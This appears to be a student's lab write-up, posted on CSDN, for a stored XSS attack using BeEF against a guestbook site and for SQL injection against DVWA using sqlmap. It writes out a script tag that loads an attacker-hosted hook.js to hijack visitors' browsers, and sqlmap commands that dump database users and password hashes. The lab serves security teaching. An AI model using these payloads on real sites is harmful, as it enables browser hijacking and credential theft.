渗透测试实验三:XSS和SQL注入

最新推荐文章于 2023-11-05 09:46:58 发布
最新推荐文章于 2023-11-05 09:46:58 发布
阅读量721 收藏 1
点赞数
文章标签: xss sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62270288/article/details/127989877
版权
  1. 实验目的和要求

 

了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

2.系统环境:

Kali Linux 2、Windows Server

3.网络环境:

交换网络结构

4.实验工具: 

Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

5.实验步骤

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。

windows server2003 IIS搭建参考网站:
windows server2003 如何搭建asp网站环境_haha13l4的博客-CSDN博客

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

 扫描发现error.asp与add.asp存在xxs漏洞

2.Kali使用beef生成恶意代码,截图。

 

 

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

<script src="http://Kali的IP地址:3000/hook.js"></script>,截图。

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。

 

回答问题:实验中XSS攻击属于哪种类型

本次实验中的XSS攻击属于存储型。

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。

先将DVWA Security的Script Security等级改为low

1、注入点发现。首先肯定是要判断是否有注入漏洞。

输入1返回正常

再输入 1’返回You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1,判断有注入点

 

同时也可以得到url:http://192.168.10.131/dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit#

然后获取 cookie中的 PHPSESSID:在Firefox(google)中按F12,找到cookie,即可查看cookie

 

PHPSESSID:81e33b1863da59244cecd1fffe37df9d

security:low

2、枚举当前使用的数据库名称和用户名。

   

 

输入的命令:

Sqlmap -u "http://192.168.10.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=81e33b1863da59244cecd1fffe37df9d" --current-db --current-user                                                      

 Sqlmap输出截图。

 

3、枚举数据库用户名和密码

输入的命令:

sqlmap -u "http://192.168.10.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=81e33b1863da59244cecd1fffe37df9d" --users --password

Sqlmap输出截图

 

4.枚举数据库

输入的命令:

sqlmap -u "http://192.168.10.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=81e33b1863da59244cecd1fffe37df9d" --dbs

Sqlmap输出截图

 

5.枚举数据库和指定数据库的数据表

输入的命令:

sqlmap -u "http://192.168.10.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=81e33b1863da59244cecd1fffe37df9d" -D dvwa --tables

Sqlmap输出截图

 

6、获取指定数据库和表中所有列的信息

输入的命令:

sqlmap -u "http://192.168.10.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=81e33b1863da59244cecd1fffe37df9d" -D dvwa -T users --columns

Sqlmap输出截图

 

7、枚举指定数据表中的所有用户名与密码,并down到本地

输入的命令:

sqlmap -u "http://192.168.10.131/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=81e33b1863da59244cecd1fffe37df9d" -D dvwa -T users -C user,password --dump

Sqlmap输出截图

 

查看down到本地的用户名与密码。

进入到保存的目录然后输入cat users.csv即可查看

 

koo364
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络渗透测试实验三XSSSQL注入
weixin_47356546的博客
12-25 596
实验二 网络嗅探与身份认证 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
渗透测试实验3:XSSSQL注入
ColdMoon_Rain的博客
12-14 514
实验准备 实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境 Kali Linux 2、Windows Server 网络环境 交换网络结构 实验工具 Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验 XSS 实验环境搭建 实验具体步骤我参考了以下文章:https://b
XSS注入测试
热门推荐
u012114090的博客
07-16 4万+
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。   XSS ...
渗透测试-web安全XSS注入
harry_c的博客
10-10 774
渗透测试-web安全XSS注入基本分类存储型XSS反射型XSSDOM型XSS总结 基本分类 存储型XSS 反射型XSS DOM型XSS 存储型XSS 黑客在前端写入XSS到数据库–>用户进行web访问–>向服务器请求数据–>返回带XSS脚本的数据–>前端出发XSS 注意事项:一般通过将携带XSS的数据写入到数据库中,比如留言功能中构造对应的XSS,或者通过其他的形式写...
XSS注入(1)-两个简单测试理解反射型xss注入和存储型xss注入
妙蛙种子吃了都会妙妙秒的妙脆角的博客
02-28 7080
XSS注入(1)-两个例子理解反射型xss注入和存储型xss注入 XSS全称 Cross Site Script,为使与css语言重名,所以我们将其称为xss跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。 xss的分类主要有:反射型XSS、存储型XSS、DOM型XSS。有时也会将DOM型归于反射型XSS中,所以我们经常将xss分为反射型XSS和存储型XSS两大类。 一
网络渗透测试实验三 XSSSQL注入
weixin_62599268的博客
11-22 714
网络渗透测试实验三 XSSSQL注入
kali网络渗透实验三XSSSQL注入
FFFde博客
01-01 949
XSSSQL注入 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境: Kali Linux 2、Windows Server 网络环境: 交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA XSS部分:利用Beef劫持被攻击者客户端浏览器 实验环境
渗透测试实验三——XSSSQL注入
JNpvA的博客
12-14 521
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。 角色
kali网络渗透实验三xss攻击与sql注入
qq_51555426的博客
11-27 3463
实验三 XSSSQL注入 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏
SQL注入用例及XSS用例
05-05
安全测试,SQL注入方面的用例及XSS的操作用例
web安全XSS攻击demo
04-18
web安全XSS攻击demo,配合我个人博客使用,谢谢各位的捧场
WEB漏洞之XSS注入解析
最新发布
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-05 1064
因此,不建议在URL中使用锚点注入来执行JavaScript代码,而应该使用更安全的方法,如在HTML文档中嵌入JavaScript代码或在外部JavaScript文件中编写代码。所以:document.location.href.indexOf("default=") 的作用就是检索:default= 第一次出现的位置,如果检索的字符串值没有出现,则该方法返回 -1 ,(没有是:=== -1;如果浏览器支持锚点注入,那么在URL的井号后面添加JavaScript脚本是可以运行的。
渗透测试web安全 - XSS 最新的实用触发及绕过技巧
网络安全领域优质创作者
02-19 2666
希望在各位遇到难解决的WAF或XSS过滤器时,这份备忘录能够给大家提供一些帮助或灵感。作为例子,不能说100%完整,但是我相信这里提供的技术是2020年部分安全人员仍在使用的技术。 标签-属性分隔符 有些过滤器会“天真地认为”只有某些特定字符可以分隔标签及其属性,下面给出的是在Firefox和Chrome中能够使用的有效分隔符的完整列表: Decimal value URL En...
软件安全测试-Web安全测试详解-XSS攻击
白天像蚂蚁一样工作,晚上像蝴蝶一样生活
12-10 2379
通过该文,可以系统了解xss攻击的原理,测试,防御,无论对手工测试,还是自动化测试都可以很好的根据文章执行。
XSS测试用例
q908544703的博客
05-28 2083
下载原件地址:链接:https://pan.baidu.com/s/1HQu4daTdxfgTDWAyXUD5lA 提取码:5mw1 在这里插入图片描述
对dvwa的低中高等级进行xss漏洞测试
m0_65150886的博客
08-30 243
alert('this is low xss(reflected)')
XSS攻击(2), XSS分类, 测试方法, 防御方法, 绕过方法
探测???
10-18 2033
例如,如果一个论坛的帖子内容没有经过适当的过滤和转义,攻击者可以发布一个带有恶意脚本的帖子,当其他用户查看该帖子时,恶意脚本会在他们的浏览器中执行。对于XSS的不同类型,使用的渗透测试方法可能会有所不同。:与反射型XSS相似,尝试插入恶意载荷,但在这里,您希望这些载荷能够被存储并在后续的请求中再次呈现给用户。:查找应用程序中的所有地方,可以提交数据并在其他地方再次显示这些数据,例如评论、论坛帖子、用户资料等。恶意脚本被存储在目标服务器上(例如,数据库中),当其他用户访问某些页面时,脚本会被加载并执行。
安全测试之xss攻击通用测试用例
测试开发
04-12 828
安全测试,测xss攻击,一个通用case测出一类问题。测试开发同学可以关注一下
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值